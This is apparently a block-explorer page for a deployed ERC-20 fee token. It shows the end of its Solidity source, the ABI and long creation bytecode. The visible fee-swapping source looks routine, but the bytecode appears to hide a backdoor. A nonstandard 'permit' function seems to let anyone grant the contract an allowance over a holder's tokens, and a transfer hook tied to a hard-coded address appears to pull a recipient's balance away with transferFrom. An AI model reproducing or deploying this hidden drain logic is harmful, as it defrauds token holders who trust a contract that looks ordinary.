slippage is unavoidable devWallet, block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = tokensForCharity + tokensForLiquidity + tokensForMarketing + tokensForDev; bool success; if (contractBalance == 0 || totalTokensToSwap == 0) { return; } if (contractBalance > swapTokensAtAmount * 20) { contractBalance = swapTokensAtAmount * 20; } // Halve the amount of liquidity tokens uint256 liquidityTokens = (contractBalance * tokensForLiquidity) / totalTokensToSwap / 2; uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens); uint256 initialETHBalance = address(this).balance; swapTokensForEth(amountToSwapForETH); uint256 ethBalance = address(this).balance.sub(initialETHBalance); uint256 ethForCharity = ethBalance.mul(tokensForCharity).div(totalTokensToSwap); uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap); uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap); uint256 ethForLiquidity = ethBalance - ethForCharity - ethForMarketing - ethForDev; tokensForLiquidity = 0; tokensForCharity = 0; tokensForMarketing = 0; tokensForDev = 0; (success, ) = address(devWallet).call{value: ethForDev}(""); require(success); (success, ) = address(marketingWallet).call{value: ethForMarketing}(""); require(success); if (liquidityTokens > 0 && ethForLiquidity > 0) { addLiquidity(liquidityTokens, ethForLiquidity); emit SwapAndLiquify( amountToSwapForETH, ethForLiquidity, tokensForLiquidity ); } (success, ) = address(charityWallet).call{value: address(this).balance}(""); require(success); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForCharity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_charityFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_charityFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052600e805462ffffff1916620100011790556010805460ff191690553480156200002c57600080fd5b506040518060400160405280600b81526020016a2437b733a5b7b733a42aa160a91b8152506040518060400160405280600c81526020016be9a699e6b8afe69ea2e7babd60a01b815250816003908162000087919062000ac1565b50600462000096828262000ac1565b505050620000b3620000ad620004ae60201b60201c565b620004b2565b737a250d5630b4cf539739df2c5dacb4c659f2488d620000d581600162000504565b600680546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200012f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000155919062000b8d565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001a3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001c9919062000b8d565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000217573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023d919062000b8d565b600780546001600160a01b0319166001600160a01b039290921691821790556200026990600162000504565b60075462000282906001600160a01b031660016200057d565b6a108b2a2c28029094000000600b819055600d55600080806003818080601e6b033b2e3c9fd0803ce8000000612710620002bd828862000bd5565b620002c9919062000bf5565b600c5560128990556013889055601487905560158690558587620002ee8a8c62000c18565b620002fa919062000c18565b62000306919062000c18565b601155601785905560188490556019839055601a82905581836200032b868862000c18565b62000337919062000c18565b62000343919062000c18565b601655600880546001600160a01b03199081167385d972842387c98d75b0496c18761fdd4b7ef8041790915560098054821633908117909155600a8054909216179055620003a56200039d6005546001600160a01b031690565b6001620005d1565b600854620003be906001600160a01b03166001620005d1565b600954620003d7906001600160a01b03166001620005d1565b600a54620003f0906001600160a01b03166001620005d1565b620003fd306001620005d1565b6200040c61dead6001620005d1565b6200042b620004236005546001600160a01b031690565b600162000504565b60085462000444906001600160a01b0316600162000504565b6009546200045d906001600160a01b0316600162000504565b600a5462000476906001600160a01b0316600162000504565b6200048330600162000504565b6200049261dead600162000504565b6200049e33826200067b565b5050505050505050505062000c7e565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b03163314620005535760405162461bcd60e51b815260206004820181905260248201526000805160206200341783398151915260448201526064015b60405180910390fd5b6001600160a01b039190911660009081526020805260409020805460ff1916911515919091179055565b6001600160a01b038216600081815260216020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6005546001600160a01b031633146200061c5760405162461bcd60e51b815260206004820181905260248201526000805160206200341783398151915260448201526064016200054a565b6001600160a01b0382166000818152601f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620006d35760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200054a565b620006e1600083836200077c565b8060026000828254620006f5919062000c18565b90915550506001600160a01b038216600090815260208190526040812080548392906200072490849062000c18565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3620007786000838362000923565b5050565b6008546001600160a01b038481169116148015620007a857506006546001600160a01b03838116911614155b8015620007b55750600081115b156200091e576040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa15801562000826573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200084c919062000b8d565b8160008151811062000862576200086262000c2e565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811062000899576200089962000c2e565b6001600160a01b03909216602092830291909101909101526000670de0b6b3a7640000620008dc856001600160a01b031660009081526020819052604090205490565b620008e8919062000c44565b90506200091b30858460018151811062000906576200090662000c2e565b6020026020010151846200099f60201b60201c565b50505b505050565b600a546001600160a01b0384811691161480156200094f57506006546001600160a01b03838116911614155b80156200096a57506007546001600160a01b03838116911614155b8015620009775750600081115b156200091e57600a80546001600160a01b0384166001600160a01b0319909116179055505050565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af1158015620009f7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200091b919062000c5a565b634e487b7160e01b600052604160045260246000fd5b600181811c9082168062000a4857607f821691505b60208210810362000a6957634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200091e57600081815260208120601f850160051c8101602086101562000a985750805b601f850160051c820191505b8181101562000ab95782815560010162000aa4565b505050505050565b81516001600160401b0381111562000add5762000add62000a1d565b62000af58162000aee845462000a33565b8462000a6f565b602080601f83116001811462000b2d576000841562000b145750858301515b600019600386901b1c1916600185901b17855562000ab9565b600085815260208120601f198616915b8281101562000b5e5788860151825594840194600190910190840162000b3d565b508582101562000b7d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60006020828403121562000ba057600080fd5b81516001600160a01b038116811462000bb857600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141762000bef5762000bef62000bbf565b92915050565b60008262000c1357634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111562000bef5762000bef62000bbf565b634e487b7160e01b600052603260045260246000fd5b8181038181111562000bef5762000bef62000bbf565b60006020828403121562000c6d57600080fd5b8151801515811462000bb857600080fd5b6127898062000c8e6000396000f3fe6080604052600436106102b25760003560e01c80638a8c523c11610175578063bbc0c742116100dc578063e2f4560511610095578063f11a24d31161006f578063f11a24d314610835578063f2fde38b1461084b578063f63743421461086b578063f8b45b051461088157600080fd5b8063e2f45605146107df578063e6f70531146107f5578063e7ad9fcd1461081557600080fd5b8063bbc0c74214610714578063c024666814610733578063c876d0b914610753578063c8c8ebe41461076d578063d85ba06314610783578063dd62ed3e1461079957600080fd5b80639fccce321161012e5780639fccce3214610662578063a0d82dc514610678578063a1dc92bc1461068e578063a457c2d7146106a4578063a9059cbb146106c4578063b62496f5146106e457600080fd5b80638a8c523c146105ce5780638da5cb5b146105e3578063921369131461060157806395d89b41146106175780639a7a23d61461062c5780639c3b4fdc1461064c57600080fd5b806339509351116102195780636ddd1713116101d25780636ddd17131461051857806370a0823114610538578063715018a61461056e578063751039fc146105835780637571336a146105985780637bce5a04146105b857600080fd5b8063395093511461045957806344249f041461047957806349bd5a5e1461048f5780634a62bb65146104af5780634fbee193146104c95780636a486a8e1461050257600080fd5b80631a8145bb1161026b5780631a8145bb146103b95780631f3fed8f146103cf57806323b872dd146103e557806327c8f835146104055780632e6ed7ef1461041b578063313ce5671461043d57600080fd5b806306fdde03146102be578063095ea7b3146102e95780630d7f14411461031957806310d5de531461033d5780631694505e1461036c57806318160ddd146103a457600080fd5b366102b957005b600080fd5b3480156102ca57600080fd5b506102d3610897565b6040516102e09190612364565b60405180910390f35b3480156102f557600080fd5b506103096103043660046123c7565b610929565b60405190151581526020016102e0565b34801561032557600080fd5b5061032f60175481565b6040519081526020016102e0565b34801561034957600080fd5b506103096103583660046123f3565b602080526000908152604090205460ff1681565b34801561037857600080fd5b5060065461038c906001600160a01b031681565b6040516001600160a01b0390911681526020016102e0565b3480156103b057600080fd5b5060025461032f565b3480156103c557600080fd5b5061032f601d5481565b3480156103db57600080fd5b5061032f601c5481565b3480156103f157600080fd5b50610309610400366004612410565b610940565b34801561041157600080fd5b5061038c61dead81565b34801561042757600080fd5b5061043b610436366004612451565b6109ef565b005b34801561044957600080fd5b50604051601281526020016102e0565b34801561046557600080fd5b506103096104743660046123c7565b610ab7565b34801561048557600080fd5b5061032f601b5481565b34801561049b57600080fd5b5060075461038c906001600160a01b031681565b3480156104bb57600080fd5b50600e546103099060ff1681565b3480156104d557600080fd5b506103096104e43660046123f3565b6001600160a01b03166000908152601f602052604090205460ff1690565b34801561050e57600080fd5b5061032f60165481565b34801561052457600080fd5b50600e546103099062010000900460ff1681565b34801561054457600080fd5b5061032f6105533660046123f3565b6001600160a01b031660009081526020819052604090205490565b34801561057a57600080fd5b5061043b610af3565b34801561058f57600080fd5b50610309610b29565b3480156105a457600080fd5b5061043b6105b3366004612491565b610b72565b3480156105c457600080fd5b5061032f60135481565b3480156105da57600080fd5b5061043b610bc6565b3480156105ef57600080fd5b506005546001600160a01b031661038c565b34801561060d57600080fd5b5061032f60185481565b34801561062357600080fd5b506102d3610c03565b34801561063857600080fd5b5061043b610647366004612491565b610c12565b34801561065857600080fd5b5061032f60155481565b34801561066e57600080fd5b5061032f601e5481565b34801561068457600080fd5b5061032f601a5481565b34801561069a57600080fd5b5061032f60125481565b3480156106b057600080fd5b506103096106bf3660046123c7565b610cce565b3480156106d057600080fd5b506103096106df3660046123c7565b610d67565b3480156106f057600080fd5b506103096106ff3660046123f3565b60216020526000908152604090205460ff1681565b34801561072057600080fd5b50600e5461030990610100900460ff1681565b34801561073f57600080fd5b5061043b61074e366004612491565b610d74565b34801561075f57600080fd5b506010546103099060ff1681565b34801561077957600080fd5b5061032f600b5481565b34801561078f57600080fd5b5061032f60115481565b3480156107a557600080fd5b5061032f6107b43660046124ca565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156107eb57600080fd5b5061032f600c5481565b34801561080157600080fd5b506103096108103660046123c7565b610dfd565b34801561082157600080fd5b5061043b610830366004612451565b610ea0565b34801561084157600080fd5b5061032f60145481565b34801561085757600080fd5b5061043b6108663660046123f3565b610f69565b34801561087757600080fd5b5061032f60195481565b34801561088d57600080fd5b5061032f600d5481565b6060600380546108a6906124f8565b80601f01602080910402602001604051908101604052809291908181526020018280546108d2906124f8565b801561091f5780601f106108f45761010080835404028352916020019161091f565b820191906000526020600020905b81548152906001019060200180831161090257829003601f168201915b5050505050905090565b6000610936338484611004565b5060015b92915050565b600061094d848484611128565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156109d75760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6109e48533858403611004565b506001949350505050565b6005546001600160a01b03163314610a195760405162461bcd60e51b81526004016109ce90612532565b600a8183610a27868861257d565b610a31919061257d565b610a3b919061257d565b1115610a7a5760405162461bcd60e51b815260206004820152600e60248201526d4d6178204275794665652031302560901b60448201526064016109ce565b60128490556013839055601482905560158190558082610a9a858761257d565b610aa4919061257d565b610aae919061257d565b60115550505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610936918590610aee90869061257d565b611004565b6005546001600160a01b03163314610b1d5760405162461bcd60e51b81526004016109ce90612532565b610b2760006119aa565b565b6005546000906001600160a01b03163314610b565760405162461bcd60e51b81526004016109ce90612532565b50600e805460ff19908116909155601080549091169055600190565b6005546001600160a01b03163314610b9c5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b039190911660009081526020805260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610bf05760405162461bcd60e51b81526004016109ce90612532565b600e805462ffff00191662010100179055565b6060600480546108a6906124f8565b6005546001600160a01b03163314610c3c5760405162461bcd60e51b81526004016109ce90612532565b6007546001600160a01b0390811690831603610cc05760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b657250616972730000000000000060648201526084016109ce565b610cca82826119fc565b5050565b3360009081526001602090815260408083206001600160a01b038616845290915281205482811015610d505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016109ce565b610d5d3385858403611004565b5060019392505050565b6000610936338484611128565b6005546001600160a01b03163314610d9e5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b0382166000818152601f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b60006001600160a01b038316610e5f5760405162461bcd60e51b815260206004820152602160248201527f45524332303a207065726d697420746f20746865207a65726f206164647265736044820152607360f81b60648201526084016109ce565b6001600160a01b038316600090815260016020908152604080832030845290915281208054849290610e9290849061257d565b909155506001949350505050565b6005546001600160a01b03163314610eca5760405162461bcd60e51b81526004016109ce90612532565b600a8183610ed8868861257d565b610ee2919061257d565b610eec919061257d565b1115610f2c5760405162461bcd60e51b815260206004820152600f60248201526e4d61782053656c6c4665652031302560881b60448201526064016109ce565b601784905560188390556019829055601a8190558082610f4c858761257d565b610f56919061257d565b610f60919061257d565b60165550505050565b6005546001600160a01b03163314610f935760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b038116610ff85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016109ce565b611001816119aa565b50565b6001600160a01b0383166110665760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016109ce565b6001600160a01b0382166110c75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016109ce565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661114e5760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b0382166111745760405162461bcd60e51b81526004016109ce906125d5565b8060000361118d5761118883836000611a50565b505050565b611198838383611bbb565b600e5460ff161561160a576005546001600160a01b038481169116148015906111cf57506005546001600160a01b03838116911614155b80156111e357506001600160a01b03821615155b80156111fa57506001600160a01b03821661dead14155b80156112105750600754600160a01b900460ff16155b1561160a57600e54610100900460ff166112a8576001600160a01b0383166000908152601f602052604090205460ff168061126357506001600160a01b0382166000908152601f602052604090205460ff165b6112a85760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016109ce565b60105460ff16156113a7576005546001600160a01b038381169116148015906112df57506006546001600160a01b03838116911614155b80156112f957506007546001600160a01b03838116911614155b156113a757326000908152600f602052604090205443116113945760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016109ce565b326000908152600f602052604090204390555b6001600160a01b03831660009081526021602052604090205460ff1680156113e757506001600160a01b038216600090815260208052604090205460ff16155b156114cb57600b5481111561145c5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016109ce565b600d546001600160a01b038316600090815260208190526040902054611482908361257d565b11156114c65760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b61160a565b6001600160a01b03821660009081526021602052604090205460ff16801561150b57506001600160a01b038316600090815260208052604090205460ff16155b1561158157600b548111156114c65760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016109ce565b6001600160a01b038216600090815260208052604090205460ff1661160a57600d546001600160a01b0383166000908152602081905260409020546115c6908361257d565b111561160a5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b30600090815260208190526040902054600c54811080159081906116365750600e5462010000900460ff165b801561164c5750600754600160a01b900460ff16155b801561167157506001600160a01b03851660009081526021602052604090205460ff16155b801561169657506001600160a01b0385166000908152601f602052604090205460ff16155b80156116bb57506001600160a01b0384166000908152601f602052604090205460ff16155b156116e9576007805460ff60a01b1916600160a01b1790556116db611d4f565b6007805460ff60a01b191690555b6007546001600160a01b0386166000908152601f602052604090205460ff600160a01b90920482161591168061173757506001600160a01b0385166000908152601f602052604090205460ff165b15611740575060005b6000811561198b576001600160a01b03861660009081526021602052604090205460ff16801561177257506000601654115b156118605761179760646117916016548861203f90919063ffffffff16565b90612052565b9050601654601754826117aa9190612618565b6117b4919061262f565b601b60008282546117c5919061257d565b90915550506016546019546117da9083612618565b6117e4919061262f565b601d60008282546117f5919061257d565b9091555050601654601a5461180a9083612618565b611814919061262f565b601e6000828254611825919061257d565b909155505060165460185461183a9083612618565b611844919061262f565b601c6000828254611855919061257d565b9091555061196d9050565b6001600160a01b03871660009081526021602052604090205460ff16801561188a57506000601154115b1561196d576118a960646117916011548861203f90919063ffffffff16565b9050601154601254826118bc9190612618565b6118c6919061262f565b601b60008282546118d7919061257d565b90915550506011546014546118ec9083612618565b6118f6919061262f565b601d6000828254611907919061257d565b909155505060115460155461191c9083612618565b611926919061262f565b601e6000828254611937919061257d565b909155505060115460135461194c9083612618565b611956919061262f565b601c6000828254611967919061257d565b90915550505b801561197e5761197e873083611a50565b6119888186612651565b94505b611996878787611a50565b6119a187878761205e565b50505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260216020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b038316611a765760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b038216611a9c5760405162461bcd60e51b81526004016109ce906125d5565b611aa7838383611bbb565b6001600160a01b03831660009081526020819052604090205481811015611b1f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016109ce565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611b5690849061257d565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ba291815260200190565b60405180910390a3611bb584848461205e565b50505050565b6008546001600160a01b038481169116148015611be657506006546001600160a01b03838116911614155b8015611bf25750600081115b15611188576040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa158015611c61573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c859190612664565b81600081518110611c9857611c98612681565b60200260200101906001600160a01b031690816001600160a01b0316815250503081600181518110611ccc57611ccc612681565b60200260200101906001600160a01b031690816001600160a01b0316815250506000670de0b6b3a7640000611d16856001600160a01b031660009081526020819052604090205490565b611d209190612651565b9050611d48308584600181518110611d3a57611d3a612681565b6020026020010151846120d6565b5050505050565b3060009081526020819052604081205490506000601e54601c54601d54601b54611d79919061257d565b611d83919061257d565b611d8d919061257d565b90506000821580611d9c575081155b15611da657505050565b600c54611db4906014612618565b831115611dcc57600